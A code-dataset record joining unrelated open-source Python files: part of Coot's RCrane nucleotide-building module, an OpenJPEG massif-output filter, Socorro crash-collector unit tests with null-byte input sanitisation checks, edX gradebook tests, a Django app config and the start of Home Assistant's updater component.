Defaults to False.
onlyPucker - should only be provided if curRot and nextRot are None. This is used when we're only building
a single nucleotide, so we don't have a full suite and therefore can't predict a conformer
RETURNS:
None
"""
if curResType == "A" or curResType == "G":
glycosidicBaseAtom = " N9 "
else:
glycosidicBaseAtom = " N1 "
#figure out the sugar puckers
prevPucker = None
curPucker = None
nextPucker = None
if isinstance(curRot, basestring): #basestring includes unicode and non-unicode strings. It's overkill here, but it can't hurt
(prevPucker, curPucker) = puckerList[curRot]
elif isinstance(curRot, list):
#if curRot is a list, then it's not really a rotamer, it's just a list of the current torsion values
#in this case, we can use delta to figure out the appropriate pucker
if curRot[0] < 114.5:
prevPucker = 3
else:
prevPucker = 2
if not isinstance(nextRot, basestring):
#if nextRot is a real rotamer, then don't bother with delta-based guesses
if curRot[6] < 114.5:
curPucker = 3
else:
curPucker = 2
if isinstance(nextRot, basestring): #basestring includes unicode and non-unicode strings. It's overkill here, but it can't hurt
#if nextRot is a rotamer
(curPucker, nextPucker) = puckerList[nextRot]
elif isinstance(nextRot, list):
#if nextRot is a list, then it's not really a rotamer, it's just a list of the current torsion values
#in this case, we can use delta to figure out the appropriate pucker
if curPucker is None:
#if we had a real rotamer for curRot, then don't overwrite it with our delta-based guess
if nextRot[0] < 114.5:
curPucker = 3
else:
curPucker = 2
if nextRot[6] < 114.5:
nextPucker = 3
else:
nextPucker = 2
#curPucker may get set twice here, but that doesn't matter, since curRot and nextRot *must* agree on their overlapping pucker
#if we don't have any conformers, then set curPucker to onlyPucker
if onlyPucker is not None and curPucker is None:
curPucker = onlyPucker
#split the residue numbers
(prevPrevResNum, prevPrevResInsCode) = __splitResNum(prevPrevResNumFull)
(prevResNum, prevResInsCode) = __splitResNum(prevResNumFull)
(curResNum, curResInsCode) = __splitResNum(curResNumFull)
(nextResNum, nextResInsCode) = __splitResNum(nextResNumFull)
#figure out the number of the residue before prevResNum
phenixRestraints.setAngleRestraints(molNum, chain, prevPrevResNum, prevResNum, curResNum, nextResNum, glycosidicBaseAtom, prevPucker, curPucker, nextPucker, nextResAlreadyBuilt)
phenixRestraints.setBondRestraints(molNum, chain, prevResNum, curResNum, nextResNum, glycosidicBaseAtom, prevPucker, curPucker, nextPucker, nextResAlreadyBuilt)
def enablePhenixRestraints():
"""Enable Phenix's pucker-specific restraints for minimization
ARGUMENTS:
None
RETURNS:
True if enabling the restraints succeeded, False otherwise
NOTE:
Phenix restraints are only available in versions of Coot newer than 3926
"""
global USE_PHENIX_RESTRAINTS
if svn_revision() >= 3926:
#Coot revision 3926 has a bug fix to fix non-bonded constraints when using extra bond and angle restraints
USE_PHENIX_RESTRAINTS = True
print "Using Phenix restraints"
return True
else:
print "Coot must be newer than 0.7-pre r3926 to use Phenix restraints. Using Coot/CCP4 restraints."
return False
def disablePhenixRestraints():
"""Disable Phenix's pucker-specific restraints for minimization and use the Coot/CCP4 restraints instead
ARGUMENTS:
None
RETURNS:
True (for consistency with enablePhenixRestraints())
"""
global USE_PHENIX_RESTRAINTS
USE_PHENIX_RESTRAINTS = False
print "Using Coot/CCP4 restraints"
return True
def usingPhenixRestraints():
"""Check if we are using Phenix's pucker-specific restraints for minimization
ARGUMENTS:
None
RETURNS:
True if we are using Phenix restraints
False if we are using Coot/CCP4 restraints
"""
return USE_PHENIX_RESTRAINTS
def __fixEntireResidue(molNum, chain, resNumFull, atomList):
"""Fix all atoms in a residue
ARGUMENTS:
molNum - the molecule number of the residue to fix
chain - the chain of the residue to fix
resNumFull - the residue number of the residue to fix including insertion code
atomList - a list of all atoms in the specified residue
RETURNS:
None
"""
(resNum, insCode) = __splitResNum(resNumFull)
fixList = [[chain, resNum, "", curAtom, ""] for curAtom in atomList]
mark_multiple_atoms_as_fixed(molNum, fixList, 1)
def buildOnlyPhosOxy(pseudoMol, resIndex, direction = 3):
"""Build the non-bridging oxygens onto a terminal nucleotide
ARGUMENTS:
pseudoMol - the pseudoMolecule object currently being used to display the chain
resIndex - the index of the residue to build the phosphoryl oxygens onto
OPTIONAL ARGUMENTS:
direction - which side of the residue to add the phosphoryl oxygens to
RETURNS:
None
"""
#print "In buildOnlyPhosOxy with resIndex =", resIndex
if direction == 3:
chain = pseudoMol.createPartialChainObjectFromIndex(resIndex-1, resIndex)
prevResAtoms = chain.nucleotides[0].atoms
curResAtoms = chain.nucleotides[1].atoms
else:
chain = pseudoMol.createPartialChainObjectFromIndex(resIndex, resIndex)
curResAtoms = chain.nucleotides[0].atoms
prevResAtoms = None
#from pprint import pprint
#pprint(prevResAtoms)
#pprint(curResAtoms)
phosOxyCoords = buildInitOrTerminalPhosOxy(curResAtoms, prevResAtoms)
pseudoMol.addPhosOxyFromIndex(resIndex, phosOxyCoords)
class ProgressDialogObject:
"""A class for displaying a progress dialog while calculating/minimizing backbone coordinates"""
def __init__(self, window, totalNum):
"""Initialize a ProgressDialogObject object
ARGUMENTS:
window - the window object to display the progress dialog in
if None, a new window will be created
totalNum - the total number of steps for the progress bar
akin to the deprecated set_discrete_blocks functionality
RETURNS:
an initialized ProgressDialogObject object
EFFECTS:
If provided, the contents of window are replaced by a progress bar
The contents of window can later be restored using restoreWindow()
"""
self.__window = window
self.__oldWindowSize = None
self.__oldWindowContents = None
self.__progressFracIncrement = None
self.__curProgressFrac = 0
self.__curProgressInt = 0
self.__totalNum = totalNum
self.__progressbar = None
if self.__window is not None:
windowChild = self.__window.get_child()
if windowChild is not None:
self.__oldWindowSize = window.get_size()
self.__oldWindowContents = windowChild
self.__window.remove(windowChild)
else:
self.__window = createRCraneWindowObject()
self.__createProgressDialog()
def __createProgressDialog(self):
"""Add the ProgressBar to self.__window
ARGUMENTS:
None
RETURNS:
None
"""
windowBox = gtk.VBox(False, VBOX_SPACING)
self.__window.add(windowBox)
self.__window.resize(1,1) #remove any size constraints
calculatingLabel = gtk.Label("\n Calculating backbone coordinates... \n\n Please wait... \n")
calculatingLabel.set_justify(gtk.JUSTIFY_CENTER)
windowBox.pack_start(calculatingLabel, False, False, HBOX_SPACING)
self.__progressbar = gtk.ProgressBar()
self.__progressbar.set_text("Built 0 of " + str(self.__totalNum) + " nucleotides")
progressAlign = gtk.Alignment(xscale=0.9, xalign=0.5)
progressAlign.add(self.__progressbar)
windowBox.pack_start(progressAlign, False, False, HBOX_SPACING)
self.__window.show_all()
self.__progressFracIncrement = 1.0 / (self.__totalNum)
def progress(self, step = 1):
"""Increment the progress bar
OPTIONAL ARGUMENTS:
step - how many steps to increment the progress bar by, defaults to 1
RETURNS:
None
"""
self.__curProgressFrac += (step * self.__progressFracIncrement)
self.__curProgressInt += step
#make sure __curProgressFrac isn't > 1 due to a rounding error
if self.__curProgressFrac > 1:
self.__curProgressFrac = 1
self.__progressbar.set_fraction(self.__curProgressFrac)
self.__progressbar.set_text("Built " + str(self.__curProgressInt) + " of " + str(self.__totalNum) + " nucleotides")
def restoreWindow(self):
"""Restore the original contents of the window and destroy the ProgressDialogObject object
ARGUMENTS:
None
RETURNS:
None
EFFECTS:
the original contents of the window are destroyed
the ProgressDialogObject is set to None, since it is no longer useful
"""
windowChild = self.__window.get_child()
self.__window.remove(windowChild)
if self.__oldWindowContents is not None:
self.__window.add(self.__oldWindowContents)
#set the window back to the size it was before
if self.__oldWindowSize is not None:
self.__window.resize(*self.__oldWindowSize)
#set the object to none, since it's useless now
#but don't actually call a destructor
self = None
|
jlec/coot
|
rcrane/calcCoords.py
|
Python
|
gpl-3.0
| 77,459
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, IntoPIX SA
# Contact: support@intopix.com
# Author: Even Rouault
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
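# Print the heap tree of the peak snapshot from a massif output file (as produced by Valgrind's massif tool):
# everything after the "heap_tree=peak" line up to, but not including, the next "#-----------" separator.
# Usage: filter_massif_output.py <massif output file>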
lines = open(sys.argv[1], 'rt').readlines()
display_next_lines = False
for line in lines:
line = line.replace('\n', '')
if line == 'heap_tree=peak':
display_next_lines = True
elif display_next_lines:
if line == '#-----------':
break
print(line)
|
AlienCowEatCake/ImageViewer
|
src/ThirdParty/OpenJPEG/openjpeg-2.4.0/tests/profiling/filter_massif_output.py
|
Python
|
gpl-3.0
| 1,727
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import hashlib
import StringIO
import gzip
import web
import mock
from nose.tools import eq_, ok_
from datetime import datetime
from contextlib import closing
from configman.dotdict import DotDict
from socorro.collector.wsgi_breakpad_collector import BreakpadCollector
from socorro.collector.throttler import ACCEPT, IGNORE, DEFER
from socorro.unittest.testbase import TestCase
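# Minimal stand-in for a form field object exposing a .value attribute; the tests below expect the
# collector to unwrap such objects to their .value when building the raw crash.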
class ObjectWithValue(object):
def __init__(self, v):
self.value = v
class TestCollectorApp(TestCase):
def get_standard_config(self):
config = DotDict()
config.logger = mock.MagicMock()
config.throttler = mock.MagicMock()
config.collector = DotDict()
config.collector.collector_class = BreakpadCollector
config.collector.dump_id_prefix = 'bp-'
config.collector.dump_field = 'dump'
config.collector.accept_submitted_crash_id = False
config.collector.accept_submitted_legacy_processing = False
config.collector.checksum_method = hashlib.md5
config.crash_storage = mock.MagicMock()
return config
def test_setup(self):
config = self.get_standard_config()
c = BreakpadCollector(config)
eq_(c.config, config)
eq_(c.logger, config.logger)
eq_(c.throttler, config.throttler)
eq_(c.crash_storage, config.crash_storage)
eq_(c.dump_id_prefix, 'bp-')
eq_(c.dump_field, 'dump')
def test_make_raw_crash(self):
config = self.get_standard_config()
form = DotDict()
form.ProductName = 'FireSquid'
form.Version = '99'
form.dump = 'fake dump'
form.some_field = '\x0023'
form.some_other_field = ObjectWithValue('XYZ')
class BreakpadCollectorWithMyForm(config.collector.collector_class):
def _form_as_mapping(self):
return form
c = BreakpadCollectorWithMyForm(config)
rc, dmp = c._get_raw_crash_from_form()
eq_(rc.ProductName, 'FireSquid')
eq_(rc.Version, '99')
eq_(rc.some_field, '23')
eq_(rc.some_other_field, 'XYZ')
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST(self, mocked_web, mocked_webapi, mocked_utc_now, mocked_time):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = '\x00FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_reject_browser_with_hangid(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform[u'\u0000ProductName'] = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.HangID = 'xyz'
rawform.ProcessType = 'browser'
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.throttle_rate = None
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc = dict(erc)
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (IGNORE, None)
r = c.POST()
eq_(r, "Unsupported=1\n")
ok_(not
c.crash_storage.save_raw_crash.call_count
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_crash_id(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3cx\x0042-47a5-843f-a0f892140107'
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_crash_id_and_use_it(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
config.collector.accept_submitted_crash_id = True
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
rawform.legacy_processing = str(DEFER)
rawform.throttle_rate = 100
rawform.dump_checksums = "this is poised to overwrite and cause trouble"
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = DEFER
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (DEFER, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('140107\n'))
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_legacy_processing(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform.some_field = '23'
rawform.some_other_field = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
rawform.legacy_processing = u'1'
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web')
def test_POST_with_existing_legacy_processing_and_use_it(
self,
mocked_web,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
config.collector.accept_submitted_crash_id = True
config.collector.accept_submitted_legacy_processing = True
c = BreakpadCollector(config)
rawform = DotDict()
rawform.ProductName = 'FireSquid'
rawform.Version = '99\x00'
rawform.dump = DotDict({'value': 'fake dump', 'file': 'faked file'})
rawform.aux_dump = DotDict({'value': 'aux_dump contents', 'file': 'silliness'})
rawform[u'some_field\u0000'] = '23'
rawform[u'some_\u0000other_field'] = ObjectWithValue('XYZ')
rawform.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
rawform.legacy_processing = str(DEFER)
rawform.throttle_rate = 100
form = DotDict(rawform)
form.dump = rawform.dump.value
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = DEFER
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.uuid = '332d798f-3c42-47a5-843f-a0f892140107'
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
mocked_web.input.return_value = form
mocked_webapi.rawinput.return_value = rawform
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (DEFER, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('140107\n'))
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
@mock.patch('socorro.collector.wsgi_breakpad_collector.time')
@mock.patch('socorro.collector.wsgi_breakpad_collector.utc_now')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.webapi')
@mock.patch('socorro.collector.wsgi_breakpad_collector.web.ctx')
def test_POST_with_gzip(
self,
mocked_web_ctx,
mocked_webapi,
mocked_utc_now,
mocked_time
):
config = self.get_standard_config()
c = BreakpadCollector(config)
form = """
--socorro1234567
Content-Disposition: form-data; name="ProductName"
FireSquid
--socorro1234567
Content-Disposition: form-data; name="Version"
99
--socorro1234567
Content-Disposition: form-data; name="some_field"
23
--socorro1234567
Content-Disposition: form-data; name="some_other_field"
XYZ
--socorro1234567
Content-Disposition: form-data; name="dump"; filename="dump"
Content-Type: application/octet-stream
fake dump
--socorro1234567
Content-Disposition: form-data; name="aux_dump"; filename="aux_dump"
Content-Type: application/octet-stream
aux_dump contents
"""
erc = DotDict()
erc.ProductName = 'FireSquid'
erc.Version = '99'
erc.some_field = '23'
erc.some_other_field = 'XYZ'
erc.legacy_processing = ACCEPT
erc.timestamp = 3.0
erc.submitted_timestamp = '2012-05-04T15:10:00'
erc.throttle_rate = 100
erc.dump_checksums = {
'dump': '2036fd064f93a0d086cf236c5f0fd8d4',
'aux_dump': 'aa2e5bf71df8a4730446b2551d29cb3a',
}
erc = dict(erc)
with closing(StringIO.StringIO()) as s:
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(form)
g.close()
gzipped_form = s.getvalue()
mocked_webapi.data.return_value = gzipped_form
mocked_web_ctx.configure_mock(
env={
'HTTP_CONTENT_ENCODING': 'gzip',
'CONTENT_ENCODING': 'gzip',
'CONTENT_TYPE':
'multipart/form-data; boundary="socorro1234567"',
'REQUEST_METHOD': 'POST'
}
)
mocked_utc_now.return_value = datetime(2012, 5, 4, 15, 10)
mocked_time.time.return_value = 3.0
c.throttler.throttle.return_value = (ACCEPT, 100)
r = c.POST()
ok_(r.startswith('CrashID=bp-'))
ok_(r.endswith('120504\n'))
erc['uuid'] = r[11:-1]
c.crash_storage.save_raw_crash.assert_called_with(
erc,
{'dump':'fake dump', 'aux_dump':'aux_dump contents'},
r[11:-1]
)
def test_no_x00_character(self):
config = self.get_standard_config()
c = BreakpadCollector(config)
eq_(c._no_x00_character('\x00hello'), 'hello')
eq_(c._no_x00_character(u'\u0000bye'), 'bye')
eq_(c._no_x00_character(u'\u0000\x00bye'), 'bye')
|
spthaolt/socorro
|
socorro/unittest/collector/test_wsgi_breakpad_collector.py
|
Python
|
mpl-2.0
| 17,622
|
"""
Tests of the instructor dashboard spoc gradebook
"""
from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr
from six import text_type
from capa.tests.response_xml_factory import StringResponseXMLFactory
from courseware.tests.factories import StudentModuleFactory
from lms.djangoapps.grades.tasks import compute_all_grades_for_course
from student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
USER_COUNT = 11
@attr(shard=1)
class TestGradebook(SharedModuleStoreTestCase):
"""
Test functionality of the spoc gradebook. Sets up a course with assignments and
students who've scored various scores on these assignments. Base class for further
gradebook tests.
"""
grading_policy = None
@classmethod
def setUpClass(cls):
super(TestGradebook, cls).setUpClass()
# Create a course with the desired grading policy (from our class attribute)
kwargs = {}
if cls.grading_policy is not None:
kwargs['grading_policy'] = cls.grading_policy
cls.course = CourseFactory.create(**kwargs)
# Now give it some content
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
chapter = ItemFactory.create(
parent_location=cls.course.location,
category="sequential",
)
section = ItemFactory.create(
parent_location=chapter.location,
category="sequential",
metadata={'graded': True, 'format': 'Homework'}
)
cls.items = [
ItemFactory.create(
parent_location=section.location,
category="problem",
data=StringResponseXMLFactory().build_xml(answer='foo'),
metadata={'rerandomize': 'always'}
)
for __ in xrange(USER_COUNT - 1)
]
def setUp(self):
super(TestGradebook, self).setUp()
instructor = AdminFactory.create()
self.client.login(username=instructor.username, password='test')
self.users = [UserFactory.create() for _ in xrange(USER_COUNT)]
for user in self.users:
CourseEnrollmentFactory.create(user=user, course_id=self.course.id)
for i, item in enumerate(self.items):
for j, user in enumerate(self.users):
StudentModuleFactory.create(
grade=1 if i < j else 0,
max_grade=1,
student=user,
course_id=self.course.id,
module_state_key=item.location
)
compute_all_grades_for_course.apply_async(kwargs={'course_key': text_type(self.course.id)})
self.response = self.client.get(reverse(
'spoc_gradebook',
args=(text_type(self.course.id),)
))
self.assertEquals(self.response.status_code, 200)
@attr(shard=1)
class TestDefaultGradingPolicy(TestGradebook):
"""
Tests that the grading policy is properly applied for all users in the course
Uses the default policy (50% passing rate)
"""
def test_all_users_listed(self):
for user in self.users:
self.assertIn(user.username, text_type(self.response.content, 'utf-8'))
def test_default_policy(self):
# Default >= 50% passes, so Users 5-10 should be passing for Homework 1 [6]
# One use at the top of the page [1]
self.assertEquals(7, self.response.content.count('grade_Pass'))
# Users 1-5 attempted Homework 1 (and get Fs) [4]
# Users 1-10 attempted any homework (and get Fs) [10]
# Users 4-10 scored enough to not get rounded to 0 for the class (and get Fs) [7]
# One use at top of the page [1]
self.assertEquals(22, self.response.content.count('grade_F'))
# All other grades are None [29 categories * 11 users - 27 non-empty grades = 292]
# One use at the top of the page [1]
self.assertEquals(293, self.response.content.count('grade_None'))
@attr(shard=1)
class TestLetterCutoffPolicy(TestGradebook):
"""
Tests advanced grading policy (with letter grade cutoffs). Includes tests of
UX display (color, etc).
"""
grading_policy = {
"GRADER": [
{
"type": "Homework",
"min_count": 1,
"drop_count": 0,
"short_label": "HW",
"weight": 1
},
],
"GRADE_CUTOFFS": {
'A': .9,
'B': .8,
'C': .7,
'D': .6,
}
}
def test_styles(self):
self.assertIn("grade_A {color:green;}", self.response.content)
self.assertIn("grade_B {color:Chocolate;}", self.response.content)
self.assertIn("grade_C {color:DarkSlateGray;}", self.response.content)
self.assertIn("grade_D {color:DarkSlateGray;}", self.response.content)
def test_assigned_grades(self):
# Users 9-10 have >= 90% on Homeworks [2]
# Users 9-10 have >= 90% on the class [2]
# One use at the top of the page [1]
self.assertEquals(5, self.response.content.count('grade_A'))
# User 8 has 80 <= Homeworks < 90 [1]
# User 8 has 80 <= class < 90 [1]
# One use at the top of the page [1]
self.assertEquals(3, self.response.content.count('grade_B'))
# User 7 has 70 <= Homeworks < 80 [1]
# User 7 has 70 <= class < 80 [1]
# One use at the top of the page [1]
self.assertEquals(3, self.response.content.count('grade_C'))
# User 6 has 60 <= Homeworks < 70 [1]
# User 6 has 60 <= class < 70 [1]
# One use at the top of the page [1]
        self.assertEquals(3, self.response.content.count('grade_D'))
# Users 1-5 have 60% > grades > 0 on Homeworks [5]
# Users 1-5 have 60% > grades > 0 on the class [5]
# One use at top of the page [1]
self.assertEquals(11, self.response.content.count('grade_F'))
# User 0 has 0 on Homeworks [1]
# User 0 has 0 on the class [1]
# One use at the top of the page [1]
self.assertEquals(3, self.response.content.count('grade_None'))
|
hastexo/edx-platform
|
lms/djangoapps/instructor/tests/test_spoc_gradebook.py
|
Python
|
agpl-3.0
| 6,456
|
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class CoreConfig(AppConfig):
name = "core"
verbose_name = _("Hosting Service Core")
|
tejo-esperanto/pasportaservo
|
core/apps.py
|
Python
|
agpl-3.0
| 184
|
"""
Support to check for available updates.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/updater/
"""
import asyncio
import json
import logging
import os
import platform
import uuid
from datetime import timedelta
# pylint: disable=no-name-in-module, import-error
from distutils.version import StrictVersion
import aiohttp
import async_timeout
import voluptuous as vol
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
from homeassistant.const import (
ATTR_FRIENDLY_NAME, __version__ as CURRENT_VERSION)
